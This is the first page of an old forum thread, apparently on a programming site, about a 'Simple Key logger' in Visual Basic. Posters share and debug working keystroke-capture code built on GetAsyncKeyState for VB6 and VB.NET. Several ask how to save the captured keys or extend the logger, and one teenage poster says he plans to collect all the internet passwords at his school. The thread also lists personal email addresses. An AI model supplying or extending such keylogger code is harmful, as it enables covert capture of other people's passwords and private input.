Send a suggestion!

We're building a brand new version of the site, and we'd love to hear your ideas

Members

Technology Zones

IBM Learning Center

Articles

Hosted By

MaximumASP

Info

[2007] Simple Key logger

Last post 08-29-2007 3:02 AM by gangstavexx. 34 replies.
Page 1 of 3 (35 items) 1 2 3 Next >
Sort Posts: Previous Next
  • 01-01-1999 12:00 AM

    [2007] Simple Key logger

    This thread is for discussions of Simple Key logger.

    • Post Points: 90
  • Advertisement

    • Red Gate Software

    Advertisement

    Want to boost your .NET application performance?

    Some developers always seem to write efficient and lightening-fast code. What is their secret? It’s ANTS Profiler. “We improved the performance of the application up to 10 times” Dan Ports, Intrigma.

    Try it for yourself now.

  • 07-24-2004 11:28 PM In reply to

    • TDc
    • Not Ranked
    • Joined on 07-24-2004
    • New Member
    • Points 5

    Thanks

    This is awesome you just saved me a couple days of figuring out how to do it.
    This code should be enough to get me strarting.

    Thanks, from,

    TDc
    • Post Points: 0
  • 08-24-2004 1:39 AM In reply to

    • MaXed
    • Not Ranked
    • Joined on 08-24-2004
    • New Member
    • Points 10
    Well i was looking at making keyloggers as well and yea,that helped so ty.ur 14? im 14 as well  turing 15 in 2 months.If it wasnt too much troube gimme some help with extending the logger?

    unllimted_carnage@hotmail.com

    add to msn....
    • Post Points: 0
  • 04-18-2005 2:23 AM In reply to

    Thank you, you saved my ALOT of time
    • Post Points: 0
  • 05-23-2005 10:34 PM In reply to

    • crazyman
    • Not Ranked
    • Joined on 05-23-2005
    • United States
    • New Member
    • Points 5

    keylogger

    hey thanks for showing me how to make the keylogger but how do i save the keys into an alternate file?
    • Post Points: 0
  • 06-08-2005 5:41 PM In reply to

    • Defilar
    • Not Ranked
    • Joined on 06-08-2005
    • New Member
    • Points 10

    Information

    If anyone needs information how to have it saved to a or any VB help, please write to hotmailmemberservices@hotmail.com
    This is not hotmail, rather it is my own personal account, so please feel free to conract me.

    -Defilar
    • Post Points: 0
  • 06-14-2005 6:46 AM In reply to

    cheers

    thanks. im guessing this is visual basic 6.0 so no i will have all the internet passwords in the school.

    • Post Points: 0
  • 04-24-2006 4:36 PM In reply to

    • Eas
    • Not Ranked
    • Joined on 04-21-2006
    • Netherlands
    • New Member
    • Points 25

    Re: [2007] Simple Key logger

    Ty a lot.
    it's only loads of work to get rid of all the weird characters but i'll succeed.
    :-)



    • Post Points: 5
  • 06-21-2006 1:41 AM In reply to

    • pcmattman
    • Top 150 Contributor
    • Joined on 01-03-2006
    • Fanatic Member
    • Points 1,385

    Re: [2007] Simple Key logger

    I'm 15, try putting that into C++ and then I'll be impressed.

    C++ is a nightmare with this sort of thing

    Finally, are you using this key logger for legal purposes - I use key loggers on my pc to monitor usage

    gdt_set_gate(5, (unsigned long) &global_tss, sizeof( TSS_t ) + 0xFFFF, 0x89, 0x0F );

    http://www.sourceforge.net/projects/mattise - My hobby operating system (Intel, 32-bit only).
    • Post Points: 5
  • 07-04-2006 4:49 AM In reply to

    Re: [2007] Simple Key logger(How to fix the Wierd Symbols/characters)

    Dim result As Integer

    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer


    Private Sub Timer1_Timer()

    For i = 32 To 128 'Changed to 32 to 128
    result = 0
    result = GetAsyncKeyState(i)

    If result = -32767 Then
    Text1.Text = Text1.Text + Chr$(i) 'Adding the $ sign
    End If
    Next i
    End Sub



    'That should fix the wierd characters

    • Post Points: 15
  • 07-17-2006 3:37 PM In reply to

    Re: [2007] Simple Key logger(How to fix the Wierd Symbols/characters)

    Hey, can't seem to get this code to work.

    I am working on VB.net Express.

    I added the code, but I seem to get an error:

    "A call to PInvoke function 'WindowsApplication1!WindowsApplication1.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature."

     

    And of course it crashes...And ideas?

    • Post Points: 5
  • 07-19-2006 1:20 PM In reply to

    • snake86
    • Not Ranked
    • Joined on 07-19-2006
    • New Member
    • Points 5

    Re: [2007] Simple Key logger

     

    About the PInvoke error, in this context you van set the vKey type to Integer:

    Private

    Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Integer

     

    This is because the Long type was 4 byte in VB6, but in VB.NET is 8 byte

    • Post Points: 5
  • 08-12-2006 7:05 PM In reply to

    • Ganey
    • Not Ranked
    • Joined on 08-12-2006
    • New Member
    • Points 5

    When i try to run this it says 'name 'i' is not declared'

    when i try to run the code it says name 'i' is not declared

    i am using vb 2005 express

    • Post Points: 5
  • 08-25-2006 9:34 PM In reply to

    Re: [2007] Simple Key logger

    I got it working on visual basic express 2005!
    ____________________________________________________________________________
    Public Class Form1
        Dim result As Integer
        Dim i As Double
        Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Integer


        Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
            Timer1.Interval = 10
            Timer1.Enabled = True
        End Sub

        Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
            For i = 32 To 128
                result = 0
                result = GetAsyncKeyState(i)

                If result = -32767 Then
                    TextBox1.Text = TextBox1.Text + Chr(i)
                End If
            Next i
        End Sub
    End Class
    ______________________________________________________________________

























    • Post Points: 15
  • 09-13-2006 1:06 AM In reply to

    Re: [2007] Simple Key logger

    Hey, thanks for the help, I got the code to work, but it really seems to be a CPU hog!! Any suggestions on what may be causing this, or how to remedy it?

     

     

    • Post Points: 5
Page 1 of 3 (35 items) 1 2 3 Next >